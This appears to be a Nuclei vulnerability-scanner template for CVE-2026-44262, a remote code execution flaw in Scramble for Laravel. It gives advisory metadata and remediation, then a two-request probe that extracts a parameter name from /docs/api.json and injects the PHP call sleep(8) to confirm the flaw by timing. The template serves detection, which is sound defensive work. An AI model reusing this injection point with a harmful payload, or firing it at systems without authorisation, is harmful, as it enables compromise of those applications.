id: CVE-2026-44262 info: name: Scramble Laravel - Remote Code Execution author: joshuavanderpoll severity: critical description: | Scramble for Laravel >= 0.13.2 and < 0.13.22 contains a remote code execution caused by evaluation of user-controlled input in validation rules during documentation generation, letting remote attackers execute arbitrary PHP code, exploit requires publicly accessible documentation endpoints. impact: | Remote attackers can execute arbitrary PHP code, potentially leading to full application compromise. remediation: | Upgrade to version 0.13.22 or later. reference: - https://github.com/advisories/GHSA-4rm2-28vj-fj39 - https://github.com/joshuavanderpoll/CVE-2026-44262 - https://nvd.nist.gov/vuln/detail/CVE-2026-44262 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L cvss-score: 9.4 cve-id: CVE-2026-44262 epss-score: 0.0586 epss-percentile: 0.923 cwe-id: CWE-94 metadata: verified: true max-request: 2 tags: cve,cve2026,laravel,scramble,php,rce flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/docs/api.json" - "{{BaseURL}}/docs/api" stop-at-first-match: true extractors: - type: regex name: name part: body group: 1 regex: - '"name"\s*:\s*"([^"]+)"[\s\S]{1,600}"default"\s*:\s*"[^"]*\|[^"]*"' internal: true - raw: - | @timeout: 30s GET /docs/api.json?{{name}}=sleep(8) HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "duration >= 8" - "status_code == 200" condition: and # digest: 4a0a0047304502210094e270b7e48f325a8ba70f5748e4732f60ad9e51e80add9cd55e393c567bebd5022021597e9cfef1be59d1a703653df15e77924b0fbcdec317e7cac67c47f58e7b57:922c64590222798bb761d5b6d8e72950